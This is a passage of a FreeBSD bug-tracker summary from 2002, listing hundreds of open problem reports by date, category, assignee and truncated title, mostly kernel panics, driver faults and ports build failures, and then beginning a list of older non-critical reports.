uint32.h f [2002/02/27] ports/35386 ports doxygen port will not configure o [2002/02/27] kern/35396 poll(2) doesn't set POLLERR for failed co o [2002/02/28] kern/35399 poll(2) botches revents on dropped socket o [2002/02/28] kern/35425 System hang while boot on specific SMP mo o [2002/02/28] kern/35429 select(2)/poll(2)/kevent(2) can't/don't n o [2002/02/28] kern/35442 Problem transmitting runts in if_sis driv o [2002/03/01] alpha/35455 alpha Unable to compile ISA NIC devices into ke o [2002/03/01] kern/35461 trap 12 when booting with Maxtor 160G dis o [2002/03/02] kern/35482 dc driver uses wrong case to read MAC fro o [2002/03/03] misc/35506 innetgr() doesn't match wildcard fields i o [2002/03/03] kern/35511 sis(4) multicast filtering doesn't pass s o [2002/03/03] ports/35515 steve open-motif-2.1.30_2 installation deletes o [2002/03/03] ports/35517 portmgr New port: MySQL 4.0 f [2002/03/05] ports/35570 ports aureal-kmod ports has invalid Makefile o [2002/03/05] ports/35579 ports New port: phpsysinfo o [2002/03/06] docs/35620 doc make release fails in documentation for R o [2002/03/07] bin/35622 sigaltstack is missing in libc_r o [2002/03/07] ports/35631 ports SKIP and IPSEC together cause kernel pani o [2002/03/07] kern/35645 Layer 2 switching using default router of o [2002/03/07] misc/35662 send-pr and/or web pr query system screws o [2002/03/08] kern/35669 NFSROOT breaks without a gateway o [2002/03/08] docs/35678 doc docproj Makefiles for web are broken for o [2002/03/08] kern/35691 Realtek NIC driver does not work with Rea o [2002/03/09] kern/35703 /proc/curproc/file returns unknown o [2002/03/10] i386/35742 USB 2.0 attached device cannot be fdisk'd o [2002/03/10] kern/35756 USB reattach of Sony DSC-S75 fails, USB s o [2002/03/11] misc/35774 [SECURITY] Suboptimal auditing possibilit o [2002/03/11] ports/35777 des www/linux-opera does not install with lin f [2002/03/11] ports/35780 ports Update port: russian/fortuneru o [2002/03/12] alpha/35815 alpha Can't install 4.5 for Alpha from the 4.5- o [2002/03/12] bin/35842 rm -f nonexistent file successful but rm o [2002/03/13] bin/35843 maxim [PATCH] MD5 auth implemented in routed is o [2002/03/13] kern/35873 recent -STABLE dhclient doesn't see wirel o [2002/03/13] gnu/35878 /usr/bin/strip resets ABI type to FreeBSD o [2002/03/13] conf/35880 rc files could be a bit more jail friendl o [2002/03/14] kern/35887 ipfw(8) limit feature does not work prope p [2002/03/15] bin/35921 jon Wrong path reduction of dot-dot paths in o [2002/03/15] misc/35924 signal.h does not check for _POSIX_REALTI o [2002/03/15] bin/35925 fixit floppy cannot be mounted on USB dri a [2002/03/16] kern/35985 re swap double mount o [2002/03/16] kern/35986 Wrong bpf-header preceading packet when u o [2002/03/16] kern/35989 720KB floppies unusable o [2002/03/17] i386/36003 Cyclades Cyclom YeP causes panics on Free o [2002/03/17] kern/36038 bp sendfile(2) on smbfs fails, exposes kerne f [2002/03/18] kern/36056 atapicd driver won't boot with cdr-cdroms o [2002/03/18] kern/36057 atacontrol, apm, kernel panic o [2002/03/19] misc/36086 Kerberos Problem/Handbook wrong/Followup o [2002/03/19] ports/36123 portmgr seemingly bogus run-time dependency on mk f [2002/03/20] ports/36144 ports New port: pinepgp-0.17.3 o [2002/03/20] kern/36147 bogus irq 7 message being issued o [2002/03/21] kern/36160 Kernel halts while trying to detect CD-C6 o [2002/03/21] bin/36167 _THREAD_SAFE & _REENTRANT used inconsiste o [2002/03/21] docs/36168 doc -pthread/_THREAD_SAFE docs missing in gcc o [2002/03/21] bin/36175 billf Vsnprintf causes memeory leak o [2002/03/22] kern/36204 cannot install -STABLE from CD-ROM Drive o [2002/03/22] kern/36209 read() system call never returns in some o [2002/03/22] kern/36219 poll() behaves erratic on BPF file descri o [2002/03/22] kern/36220 panic: sched_sync: fsync failded vp 0xcf4 o [2002/03/23] ports/36237 portmgr registering _real_ dependencies in bsd.po o [2002/03/25] kern/36300 acd0c: 'device not configured ' after sta o [2002/03/25] ports/36303 dirk Apache with mod_php4 wont run if mod_php4 o [2002/03/25] kern/36315 panic: vm_fault on nofault entry while ru o [2002/03/26] kern/36329 reference of unexistent object f [2002/03/26] ports/36363 ports apache13-ssl - default'httpsd.conf' lack o [2002/03/27] ports/36411 glewis java/jdk13 not owner/group safe o [2002/03/28] kern/36413 the bktr driver tries to destroy device a o [2002/03/28] kern/36415 the bktr driver incorrectly handles the s a [2002/03/28] i386/36451 roger (sys/dev/bktr) Japan IF frequency is inco s [2002/03/29] bin/36473 ru Overdue MFC's in chmod/chown/chflags o [2002/03/29] kern/36482 Multiport starfire card (sf/ukphy) doesn' o [2002/03/29] ports/36484 sobomax Windowmaker 0.80.0 should be marked with o [2002/03/29] conf/36508 installation floppy bug (See description) s [2002/03/29] ports/36516 dwcjr MAINTAINER UPDATE: delete print/texinfo, o [2002/03/29] i386/36517 sis driver can't map ports/memory for Net o [2002/03/29] kern/36522 stat outside procs in procfs succeeds fro o [2002/03/30] ports/36554 netchild ports/lang/icc requires linux_devtools to o [2002/03/31] ports/36565 anholt x11/XFree86-4-libraries doesn't install e o [2002/03/31] kern/36566 System reboot with dead smb mount and umo o [2002/03/31] kern/36603 X crashes o [2002/04/01] kern/36610 acd0: MODE_SENSE_BIG command timeout - re o [2002/04/01] docs/36642 doc 4.5 man page on ipfw new option limit is o [2002/04/01] i386/36647 There is no suitable driver for SURECOM E o [2002/04/03] kern/36708 panic: ufs_dirbad: bad dir during pkg_inf o [2002/04/03] ports/36711 ports Configure Bug: cyrus-sasl-1.5.27_2 / krb o [2002/04/03] i386/36718 install boot before sysinstall halts ata1 o [2002/04/04] i386/36761 Symbol problems dependant on boot method, s [2002/04/04] ports/36772 dinoex smtpd incompatible with newest sendmail o [2002/04/05] kern/36784 Can't fcntl(fd, F_SETFL, ...) on a pseudo o [2002/04/05] kern/36790 kernel panic in biodone() on boot p [2002/04/05] ports/36804 ports portupgrade of apache13+modssl causes cer o [2002/04/06] ports/36811 anholt XFree86-4-libraries cannot find version.d o [2002/04/06] kern/36813 arr un-bzero'd sin_zero causes bind() in PF_I o [2002/04/06] ports/36819 anholt /usr/ports/x11/XFree86-4 compilation trou s [2002/04/06] ports/36826 alane x11-servers/XFree86-4-Server: xf86cfg -te o [2002/04/07] ports/36838 scrappy MICO update to 2.3.7 o [2002/04/07] ports/36843 nik auth_ldap port fix o [2002/04/07] ports/36846 ports fxtv 1.03 freezes the system when $LANG=d o [2002/04/07] kern/36858 The USB flash drive "Apacer HandyDrive" c o [2002/04/07] bin/36867 johan games/fortune: add FORTUNE_PATH env var, o [2002/04/08] kern/36876 sos Weird read-errors while accessing data fr o [2002/04/08] ports/36879 ports emulators/vmware2 freezes and reboots sys o [2002/04/08] conf/36911 installation floppies miss autoload file o [2002/04/09] bin/36926 send-pr destroys PR if emacs interrupt ch o [2002/04/09] i386/36943 reboot hangs on Tyan Thunder K7 with SMP o [2002/04/09] kern/36953 des linux emulation does not work well on SMP f [2002/04/09] ports/36954 ports PostgreSQL daylight savings fix... o [2002/04/11] i386/36991 Installing gnome from packages over the n o [2002/04/11] misc/36999 2 Default Routes Created f [2002/04/11] ports/37005 vanilla Broken build of /usr/ports/graphics/gimp1 o [2002/04/11] ports/37006 dirk cdrecord does not work with Teac USB CDRW o [2002/04/12] ports/37026 dinoex FBSD4.5/4.4 sshd coredump, for unexisting o [2002/04/12] docs/37029 doc The translation in Italian language of th o [2002/04/13] kern/37035 [PATCH] msdosfs_readdir() freezes after f o [2002/04/14] kern/37057 Problem with rlimits on filesystem mounte o [2002/04/14] ports/37085 andreas apsfilter/ghostscript don't work with hpi o [2002/04/15] kern/37109 Kernel refuses to assign unused IP to tun f [2002/04/16] ports/37142 dirk [Patch] devel/pth (use libtool and load s o [2002/04/16] bin/37159 ru more then one natd use running use the sa o [2002/04/16] kern/37171 smbfs non-functional in -STABLE o [2002/04/17] ports/37180 dirk [New Port] php-dev (apache 1.3 / 2.0 modu o [2002/04/18] ports/37223 sobomax devel/sdl12 1.2.4 broken (includes patch o [2002/04/18] bin/37224 make: $< only set for implicit rules o [2002/04/18] ports/37236 obrien bash1 port broken? o [2002/04/18] i386/37240 EtherExpress16 not probed at boot o [2002/04/19] i386/37243 dvd rom - ata0-slave: identify retries ex o [2002/04/19] ports/37251 portmgr ports seem to have to hardwire numeric us o [2002/04/19] kern/37261 luigi kernel is not linking without "device eth o [2002/04/19] ports/37262 ports gphoto2 fails to find supported USB digit o [2002/04/19] kern/37270 jeff nullfs broken by locking changes in -curr o [2002/04/20] alpha/37295 alpha Make Install of KDE2 fails on alpha o [2002/04/21] ports/37309 anholt XFree86-4 port (XFree86 4.2) doesn't comp o [2002/04/21] kern/37311 latent bug: kernel crash in -stable, same f [2002/04/21] ports/37319 ports [Patch] textproc/pspell-ispell (Makefile o [2002/04/21] kern/37326 smbus/bktr crash when omitting "device ii o [2002/04/21] kern/37332 scsi PATCH: add pen device to scsi_da.c o [2002/04/22] bin/37343 portmap TCP binds strangeness o [2002/04/22] ports/37358 ports xawtv generates sigalrm with bktr o [2002/04/22] ports/37361 sobomax installing gcc30 port breaks devel/gettex o [2002/04/23] alpha/37382 alpha de0 (tulip) DEC-21140A card stays in OACT o [2002/04/23] alpha/37385 alpha xl0 network card (509B) fails on heavy tr o [2002/04/23] misc/37399 rsh does not work from Win 2k to freeBSD o [2002/04/24] i386/37420 Copying large files from an IDE CD-ROM to o [2002/04/24] kern/37436 accept dead loop when out of file descrip o [2002/04/24] kern/37441 ISA PNP parse problem o [2002/04/24] kern/37443 incorrect move pointer in environment str o [2002/04/25] bin/37468 ports mpeg_play compiled on current/DP1 does no o [2002/04/26] i386/37482 Weird behaviour under relatively slow loa o [2002/04/26] bin/37495 /stand/sysinstall coredumps during packag o [2002/04/27] kern/37502 NFS client ignores mtime.tv_usec for open o [2002/04/28] i386/37523 lock for bios16 call and vm86call o [2002/04/28] ports/37537 ports trafcount causes reboot at 3AM every nigh o [2002/04/29] kern/37573 luigi kernel crashes when changing dummynet pip o [2002/04/29] misc/37585 System hangs on install at probing device o [2002/04/30] misc/37586 newfs failing in 5.0-DP1 initial install o [2002/04/30] kern/37589 Kernel panics upon resume from zzz on my o [2002/04/30] ports/37612 ports [New Port] PHP Development version o [2002/05/14] kern/38095 bp vlan not supported with fxp o [2002/05/15] ports/38110 ports NEW PORT: games/wmpuzzle for WindowMaker/ o [2002/05/16] kern/38139 no carrier after kernel rebuild o [2002/05/16] i386/38151 Installation of 5.0DP1 panics very early o [2002/05/16] kern/38166 ipv6_gateway_enable="YES" breaks lpd f [2002/05/17] ports/38182 dirk php 4.2.1 port fails during make o [2002/05/17] kern/38210 SIOCGIFCONF truncates interface list. o [2002/05/17] ports/38212 knu XFree86-4 and portupgrade get dependencie o [2002/05/18] misc/38241 mount_cd9660 doesn't mount/read multisess o [2002/05/20] kern/38333 ATA drives only UDMA33 after APM standby o [2002/05/21] misc/38373 ipfw-graph reboots compaq 5500r o [2002/05/21] bin/38374 [patch] crontab environment variable pars o [2002/05/21] ports/38375 dirk The port lang./php4 can't be used as CGI o [2002/05/22] kern/38438 System crashes when starting XFree4 o [2002/05/23] misc/38460 ports core dumps with ghostscript o [2002/05/24] kern/38495 soreceive fails to maintain invariant on s [2002/05/24] kern/38527 /dev/random does not obey O_NONBLOCK flag o [2002/05/25] kern/38549 the procces compiled whith pthread stoppe o [2002/05/25] kern/38554 changing interface ipaddress doesn't seem o [2002/05/25] ports/38560 cpiazza PATCH: audio/gmixer uses uninitialized po o [2002/05/25] kern/38562 bridge_cfg=*dc0* ; kldload if_dc => panic o [2002/05/26] misc/38582 qa sysinstall sets newfs flag after changing o [2002/05/26] ports/38587 kuriyama bug in snmpd v5.0.1 in freebsd systems o [2002/05/26] ports/38590 anholt XFree86 4.2 driver module cirrus_alpine.o o [2002/05/27] ports/38602 gpalmer x11-wm/tvtwm is confused about PREFIX o [2002/05/27] bin/38609 qa Sysinstall should know the size of the va o [2002/05/27] misc/38629 X window size too big for screen, how do o [2002/05/27] kern/38632 Loss of connection with wi cards o [2002/05/29] ports/38681 nectar pam_krb5-1.0.3 configure fails to determi p [2002/05/29] i386/38703 iedowse disklabel initializes fragment size to be o [2002/05/30] i386/38731 Freebsd doesn't support ( pdc20276 / Raid o [2002/05/30] kern/38736 kernel panic during memory stick removal o [2002/05/30] ports/38744 ports net/openldap2 doesn't work if db3 and db4 o [2002/05/30] kern/38752 rn_walktree_from not halting at the right o [2002/05/31] kern/38763 GENERIC kernel doesn't boot o [2002/05/31] kern/38764 Maxtor 30GB USB-2.0 drive needs quirk ent o [2002/05/31] bin/38765 CVS Daemon Vulnerability in 1.11.1p1 o [2002/05/31] ports/38770 obrien gcc 3.0.4 fails to build o [2002/05/31] bin/38778 dhclient infinite loop on ro /etc/resolv. o [2002/06/01] kern/38794 sound ESS Solo driver truncates output o [2002/06/01] kern/38795 kldunload of snd_ess, snd_sb16, snd_sb8 p o [2002/06/01] ports/38801 ports sasl_apop_patch.gz breaks LOGIN mech (SMT o [2002/06/02] misc/38835 sysinstall always installs crypto o [2002/06/03] ports/38859 portmgr lang/gnat-doc-info: fix install o [2002/06/04] kern/38883 'kldload bktr' stuck in state swwrt, exer o [2002/06/04] kern/38894 Dell PowerEdge 4600 PCI Bus scan problems o [2002/06/04] kern/38906 calcru: negative time of o [2002/06/05] bin/38918 edquota breaks silently when quota-marked o [2002/06/06] bin/38963 Unable to newfs vinum volumes o [2002/06/07] kern/38983 Kernel fails to access disk o [2002/06/10] ports/39091 ports mv *-config to libdir to coexist with apr o [2002/06/10] misc/39104 The disc in your drive looks more like an o [2002/06/10] ports/39107 portmgr _REENTRANT not defined in PTHREAD_CFLAGS o [2002/06/10] kern/39109 m_cat() does not update m_pkthdr.len o [2002/06/11] kern/39141 silby Broken PTMUD o [2002/06/11] ports/39148 cy screen consumes 100% when run o [2002/06/11] ports/39149 ume ports/mail/cyrus-imapd: cyradm causes per o [2002/06/11] ports/39151 dima acroread4 install fails o [2002/06/11] kern/39185 core dump binary in single user mode o [2002/06/12] conf/39196 src-crypto collection should be splitted o [2002/06/12] kern/39199 CASIO QV-4000 not recognized by /sys/dev/ o [2002/06/12] ports/39205 ports Patch to add nmh package files so EXMH re o [2002/06/13] kern/39233 NonConforming IPsec implementation from F o [2002/06/13] kern/39235 not writing correct data to TI1420 PCCARD o [2002/06/13] kern/39252 Syscons doesn't support 8-bit control cha o [2002/06/13] ports/39254 ports Insecure mode on scripts in the icradius o [2002/06/13] kern/39260 pcm0 locks on boot, Compaq Presario 1920 o [2002/06/14] bin/39296 sos burncd fails in dao mode o [2002/06/15] kern/39322 sos Strange detection of IDE CDROM o [2002/06/15] kern/39329 '..' at mountpoint is subject to the perm o [2002/06/15] kern/39331 dwmalone namei cache unreliable for __getcwd() o [2002/06/15] ports/39332 ports coldsync build broken on current p [2002/06/15] conf/39351 dougb /etc/rc.syscons is always ran - even if t f [2002/06/15] misc/39354 where is the Brazilian portuguese locale? o [2002/06/16] kern/39369 "pseudo-device sppp" requires net/slcompr o [2002/06/16] ports/39378 anholt XFree86-4-libraries fails to install with o [2002/06/16] kern/39388 groudier ncr/sym drivers fail with 53c810 and more a [2002/06/16] kern/39396 cjc firewall security loophole p [2002/06/17] standards/39408ache FreeBSD use wrong collate table for pl_PL o [2002/06/17] ports/39441 ports x11-wm/afterstep &afterstep-i18n install/ o [2002/06/17] kern/39447 4.5R &4.6R Kernels fail to boot w/ AHA294 o [2002/06/17] kern/39449 sos wierd ata status o [2002/06/18] bin/39478 des `ssh-keygen -p -t rsa' causes segfault o [2002/06/18] ports/39479 cy Binary version of screen-3.9.11_1 in port f [2002/06/19] kern/39499 sos sysinstall panic with ATAPI CD-ROM o [2002/06/19] kern/39502 can't write on smbfs with scp o [2002/06/19] i386/39507 FreeBSD can't boot: BTX halted problem o [2002/06/19] i386/39536 FreeBSD default bootloader does not load o [2002/06/20] i386/39604 Install failure on HP Pavilion 310n - Una o [2002/06/21] ports/39623 ports [New Ports] Development versions of PHP, o [2002/06/21] i386/39633 Errors reported in schistory.c in syscons o [2002/06/22] ports/39659 portmgr add (DOCS|EXAMPLES|DATA)DIR to PLIST_SUB o [2002/06/22] ports/39660 portmgr add ${PKGNAMEPREFIX} to (DOCS|EXAMPLES)DI o [2002/06/22] ports/39661 sobomax freetype2 fails trying to apply patch pat o [2002/06/22] ports/39662 portmgr add default MAN3PREFIX for perl ports o [2002/06/22] bin/39671 mknetid segfaults on default /etc/master o [2002/06/23] ports/39689 obrien mail/mutt patch-1.4.rr.compressed.1.gz mi o [2002/06/23] ports/39760 jedgar ports/math/rcalc is too old and contains o [2002/06/24] conf/39763 Can't get a correct MAC address for MELCO o [2002/06/24] ports/39775 ports p5-GD has erroneous dependency on X11 and o [2002/06/24] ports/39788 mharo building proftpd in ports ignores WITH_MY o [2002/06/24] i386/39802 iBCS2 emulation fork process core dumps o [2002/06/24] kern/39805 4.6R install panics with umass0 device co o [2002/06/24] kern/39813 program hangs in atprq state permanently o [2002/06/25] bin/39849 /sbin/restore fails to overwrite files wi o [2002/06/25] ports/39859 nbm ports/www/publicfile confused file name i o [2002/06/25] ports/39860 ports Crystal Space port doesn't build o [2002/06/25] ports/39863 ports sysutils/LPRng has incomplete pkg-plist [ f [2002/06/26] ports/39877 kde qt23 in release 4.6 does not compile o [2002/06/26] kern/39878 mysqld process suddenly runs at 99% CPU w f [2002/06/26] ports/39884 lioux avifile-0.7.7.20020523 can not compile f [2002/06/26] conf/39887 matusita /stand/sysinstall doesn't set sendmail_en o [2002/06/26] bin/39896 netmask 0xffffff00 no longer works in /et o [2002/06/26] bin/39906 cleaning sbin/newfs code from warnings o [2002/06/27] bin/39918 Userland PPP - CHAP and PAP are swaped o [2002/06/27] bin/39922 [PATCH?] Threaded applications executed w o [2002/06/27] kern/39928 wi0 timeouts and hangs the system while s o [2002/06/27] kern/39937 ipstealth issue o [2002/06/27] bin/39940 /usr/sbin/periodic sends thousands of ema o [2002/06/27] kern/39942 4.6-current does not play well with DG Av o [2002/06/27] ports/39943 dirk ports/www/mod_php4 build failure o [2002/06/28] kern/39960 imp wi driver can cause system crash when try o [2002/06/28] kern/39961 imp diff on if_wi.c f [2002/06/29] bin/39995 users not in @wheel cannot change their p o [2002/06/29] ports/39997 ports e2fsprogs needs mk_cmds o [2002/06/29] misc/40001 vinum showing -2 drives after removing se o [2002/06/29] kern/40023 pccard initialization & reset errors (fix o [2002/06/30] kern/40044 SMP kernel fails to boot on DELL 610 o [2002/07/01] i386/40073 Xircom Realport Ether doesn't work in Tos o [2002/07/01] ports/40088 ports Update: www/webcheck (patches deleted) o [2002/07/02] ports/40112 obrien mail/mutt: fix path for ${PREFIX}/share/d o [2002/07/02] misc/40119 will not read the cd when bsd is planning o [2002/07/02] kern/40122 Device pcm stopps booting Kernel 4.6 o [2002/07/02] ports/40123 anholt unable to build XFree86-Server-4.2.0_3 o [2002/07/02] misc/40126 dougb bind8 port puts nslookup in the wrong pla o [2002/07/02] i386/40132 Enabling the joystick interface on es137x o [2002/07/03] kern/40139 darrenr ipfilter issue o [2002/07/03] ports/40166 obrien editors/vim: distinfo not updated, Makefi o [2002/07/03] ports/40167 bp mars_nwe does not report disk full errors o [2002/07/03] ports/40168 ports NEW PORT: NotFTP, a WWW-HTTP gateway writ o [2002/07/04] kern/40176 panic: lockmgr: locking against myself -- p [2002/07/04] bin/40177 maxim /bin/sh with builtin 'test' has memory le o [2002/07/04] kern/40185 FreeBSD does not work with the nVidia nFo o [2002/07/04] ports/40189 anholt XFree86 4.2 doesn't support bg_BG.CP1251 o [2002/07/04] kern/40193 PCI devices can not be used with an nVidi o [2002/07/04] misc/40206 Can not assign alias to any POINTOPOINT i o [2002/07/04] bin/40209 __dtoa broken with -O2 or -O3 optimisatio o [2002/07/05] ports/40216 ports [xmh] xmh is unstable o [2002/07/05] ports/40218 ports [xmh] mail list does not refresh automati o [2002/07/05] bin/40219 [apm] apm breaks removable media o [2002/07/05] ports/40223 ports [xmh] Deleted mail does not appears in sc o [2002/07/05] kern/40225 ata driver incorrectly downgrades UDMA4 d o [2002/07/05] bin/40227 CVS client doesn't upload new files creat o [2002/07/05] ports/40232 ports xxgdb left button does not function prope o [2002/07/05] conf/40255 problem with installing and configuring X o [2002/07/06] misc/40260 sysinstall hangs up detecting devices (No o [2002/07/06] bin/40261 sshd allows PasswordAuthentication even t o [2002/07/06] bin/40266 telnet SRA sometimes fails at authentific f [2002/07/06] i386/40274 "fxp: device timeout" errors during heavy o [2002/07/06] bin/40278 mktime returns -1 for certain dates/timez o [2002/07/07] bin/40282 /bin/kill has bad error checking for comm o [2002/07/07] bin/40314 mail is unable to parse From line w/o ema o [2002/07/07] ports/40317 ports transcode compilation problem s [2002/07/08] ports/40342 alane koffice-kde3 build nit, need cmath.h o [2002/07/08] ports/40349 ache [Update Port] graphics/png (to 1.2.4) o [2002/07/08] ports/40353 ports new ivtools release: ivtools-1.0.4 o [2002/07/08] misc/40359 Installation hanges after plip0 on ppbus0 o [2002/07/08] misc/40363 des Syslogd crashes in function markit f [2002/07/09] bin/40382 compiling source root CVS o [2002/07/09] ports/40387 billf unable to 'make package' on net/ethereal o [2002/07/09] kern/40394 if_tap driver hard coded permission check o [2002/07/09] standards/40402standards/usr/include/stddef.h and /usr/include/st o [2002/07/10] ports/40428 kde KDE3 trashes Xresources data o [2002/07/10] i386/40432 Problema al instalar tarjeta video o [2002/07/10] ports/40441 ports sysutils/lcdproc + HD44780 + 'winamp' wir o [2002/07/11] bin/40448 [bmake bug] BSD make cannot find system m o [2002/07/11] bin/40466 pax may not handle correctly some tar arc o [2002/07/11] bin/40471 des chpass(1) -a option broken in CURRENT o [2002/07/12] ports/40484 sobomax REINPLACE_CMD doesn't understand \t o [2002/07/14] kern/40558 UDP6 sockets do not receive responses of o [2002/07/14] kern/40561 TTCP does not work with IPv6 o [2002/07/14] kern/40574 NeoMagic soundcard detection on Gateway S o [2002/07/15] ports/40610 jmz Latex build "cannot find Hyphenation patt o [2002/07/16] ports/40651 kuriyama [Patch Port] textproc/dsssl-docbook-modul o [2002/07/16] bin/40654 qa patch: sysinstall: infinite loop o [2002/07/16] bin/40655 qa patch: sysinstall assigns partition a to o [2002/07/16] bin/40656 qa patch: sysinstall: scripted deletion of s o [2002/07/16] ports/40672 sobomax wsoundserver defaults to using esound and o [2002/07/16] java/40677 java J2SDK 1.4.0.01 fails to do anything when o [2002/07/17] bin/40697 fsck[_ffs](8) doesn't ensure that (signed o [2002/07/19] kern/40766 NEWCARD freeses system while card inserti o [2002/07/19] ports/40774 gnats-admin o [2002/07/19] kern/40787 page fault while in kernel mode o [2002/07/19] kern/40792 signals lead to data loss on device ugen o [2002/07/20] misc/40802 adduser ignores password format o [2002/07/20] ports/40816 ports Port update for databases/sqlite o [2002/07/21] ports/40829 ports [Maintainer Update] www/php-templates a [2002/07/21] misc/40837 SMC EN5251BE ethernet chipset gets incorr o [2002/07/21] docs/40841 doc the PPP primer gives a very wrong ppp.con o [2002/07/21] ports/40844 ports Syntax error on german/BBBike/Makefile o [2002/07/22] ports/40886 ache pkpkg_delete apache-1.3.26_3 does not w o [2002/07/22] kern/40895 wierd kernel / device driver bug o [2002/07/22] kern/40903 Busy_count is < 0 message keeps counting o [2002/07/23] misc/40941 robert syslogd "!prog" fails for progs with non- o [2002/07/23] i386/40945 FreeBSD can not support IBM ServeRAID4Lx o [2002/07/25] i386/40972 Stallion Multiport Serial Driver . o [2002/07/25] ports/40973 emulationInvalid behavior of emulators/rtc on -CUR o [2002/07/26] kern/41007 overfull traffic on third and fourth adap o [2002/07/26] i386/41020 Installation was successful only after I f [2002/07/27] conf/41054 Sendmail assumptions in startup scripts m o [2002/07/27] ports/41075 portmgr devel/gmake segfaults in non-default loca o [2002/07/29] kern/41125 adrian squid-2.4.STABLE7 loop on poll() - SMP ke o [2002/07/29] ports/41128 greid recv_addr init wrong and 512 byte udp pac o [2002/07/29] i386/41138 silby vr0 locks up on one hub, OK on another o [2002/07/29] bin/41145 newfs core dump (args : -b 262144 -f 3276 o [2002/07/30] ports/41168 ports graphics/linux-png not installable o [2002/07/30] bin/41182 Makefile syntax error? o [2002/07/30] kern/41183 Booting with degraded RAID1 as system dis o [2002/07/30] ports/41184 ports new port - lingoteach, a language teachin o [2002/07/31] kern/41214 boot loader cannot use USB o [2002/07/31] kern/41216 Get "NFS append race" error o [2002/08/01] kern/41227 Serial port IRQs cannot be shared when th o [2002/08/01] ports/41237 knu portupgrade fails o [2002/08/01] misc/41242 periodic scripts make unwarrented assumpt o [2002/08/01] ports/41247 ports New port: net/nrpe o [2002/08/01] ports/41248 knu portupgrade -a fails in `deorigin': faile o [2002/08/01] ports/41254 pat x11-wm/ion build failure o [2002/08/02] conf/41273 USR Wi-Fi Card type 2410 is not detected p [2002/08/03] misc/41289 inet_ntop(3) buffer overflow o [2002/08/03] bin/41297 mp {t,}csh backquote/braces expansion bug f [2002/08/04] bin/41327 jon skey decrementing but not authorizing wit o [2002/08/04] misc/41331 Pthread library open sets O_NONBLOCK flag o [2002/08/05] ports/41342 des gnatsd reveals passwords to syslog o [2002/08/05] ports/41349 ports /bin/sh MFC from PR/40386 breaks pwcheck, o [2002/08/05] ports/41366 portmgr Mk/bsd.port.mk: PKG_SUFX=.tbz incorrect f o [2002/08/06] kern/41374 panic: Removing other than first element o [2002/08/06] kern/41382 ATAPI TAPE hung in atrpq o [2002/08/06] kern/41386 obrien uudecode of libc.so.3.1.bz2.uu in compat2 o [2002/08/06] bin/41388 src/contrib/bind/bin/dig/dig.c has bug in o [2002/08/07] i386/41403 error when running make depend on kernel o [2002/08/07] bin/41410 /bin/sh bug on expanding $? in here-docum o [2002/08/07] bin/41435 dhclient writes lease file that it can't o [2002/08/08] ports/41452 wjv p [2002/08/09] bin/41482 sobomax pkg_info core-dumps for old style +CONTEN o [2002/08/09] ports/41493 ports Install fails for port: ghostscript-gnu. f [2002/08/09] ports/41498 gnome gconf in ports doesn't build. o [2002/08/10] kern/41525 SiS 630 Modem and Soundcard on FreeBSD 4. o [2002/08/10] kern/41527 unable to umount /dev/fd o [2002/08/10] kern/41530 CTM stable src-4.1099 builds kernel w/ se o [2002/08/11] ports/41545 ports Port kdebase 3.0.2_2 (kdebase3) does not o [2002/08/11] kern/41552 TCP timers' sysctl's overflow o [2002/08/11] misc/41557 periodic daily -> 500.ipfwdenied -> syste o [2002/08/12] ports/41575 dirk www/mod_php4 fails with dup symbols from o [2002/08/12] pending/41589gnats-admin o [2002/08/12] ports/41600 dirk latest Mysql 3.23.51 port broke, no remot o [2002/08/13] kern/41632 bridging when one interface has no carrie o [2002/08/13] misc/41635 dhclient kernel panics when dhcp server i o [2002/08/13] ports/41637 ports Update port: pam-pgsql (fixed coredump on o [2002/08/13] ports/41639 ports Libraries Qt3 (3.0.5_1) doesn't compile o [2002/08/13] alpha/41642 alpha dhclient gives unaligned access on Alpha o [2002/08/13] ports/41648 ports Maintainer update of ports (science/MPQC) o [2002/08/13] kern/41651 READ_BIG errors from acd driver o [2002/08/13] ports/41652 ports port update science/chemtool o [2002/08/14] bin/41671 gcc produces bad debug info o [2002/08/14] ports/41676 dirk mysql-server 3.23.51_2 unusable (signal 1 o [2002/08/15] ports/41681 ports Can't build ports/devel/apr o [2002/08/16] ports/41705 trevor Port of Acrobat 5 doesn't seem to patch t o [2002/08/16] ports/41716 ports x11-fonts/webfonts cannot be fetched anym o [2002/08/16] kern/41720 if_nge_load=YES make system not bootable o [2002/08/16] kern/41722 Setting time backward can cause a panic i o [2002/08/16] kern/41740 vinum issues: page fault while rebuilding f [2002/08/16] i386/41741 Cron calling periodic spawns hundreds of o [2002/08/18] i386/41757 sysinstall 4.6.x unstable o [2002/08/18] ports/41767 obrien make clean causes infinite loop o [2002/08/19] i386/41776 mrouted doesn't route multicast packets o [2002/08/19] bin/41777 /etc/periodic/daily/100.clean-disks remov o [2002/08/19] ports/41778 naddy ksh93 dumps core o [2002/08/19] ports/41783 ports port x11/XFree86-4 will not build - missi 1067 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- f [1995/01/11] i386/105 Distributed libm (msun) has non-standard s [1995/09/26] kern/742 syslog errors accessing Mac hard disks [p s [1995/11/20] kern/831 one minor complaint about the kernel visu a [1996/01/30] bin/981 fenner clnt_broadcast() is not aware of aliases a [1996/07/07] bin/1375 eivind Extraneous warning from mv(1) [PATCH] s [1996/10/13] misc/1791 tegge syslimits.h does not allow overriding def f [1996/10/20] bin/1849 gdb sets library breakpoints on the wrong s [1996/11/22] bin/2090 clients may bind to FreeBSD ypserv refusi s [1996/12/02] bin/2137 tegge vm statistics are bad s [1996/12/14] bin/2216 [PATCH] Ada specs not being compiled into s [1996/12/27] kern/2298 Support for DSR/DCD swapping on serial po a [1996/12/27] misc/2302 brandon new crypt() including SHS and an extendab o [1997/01/10] bin/2442 davidn setusershell()/endusershell() missing o [1997/01/28] bin/2603 dufault Added POSIX.4/POSIX.1b constants in unist a [1997/02/02] bin/2641 wpaul login_access.c doesn't work with NIS by d s [1997/02/15] misc/2745 fenner PR querry web form doesn't sort correctly o [1997/03/10] bin/2934 cracauer sh(1) has problems with $ENV s [1997/03/10] bin/2938 hoek Add -b, -l, and -f options to du(1) o [1997/04/14] bin/3284 mikeh [PATCH] symorder(1): -t option doesn´t wo p [1997/05/08] gnu/3552 the -L option of tar does not work proper f [1997/05/16] bin/3608 jkoshy Telnet in linemode will break apart long o [1997/06/02] bin/3762 dufault Bogus return values from rtprio(1) f [1997/06/10] bin/3837 dufault new feature for rtprio o [1997/06/24] kern/3944 paul if_le doesnt receive ether multicast pack o [1997/06/25] kern/3948 jlemon nonworking t/tcp server side o [1997/07/18] bin/4116 davidn Kerberized login as .root fails to s [1997/07/26] bin/4172 des suggest reconnection option 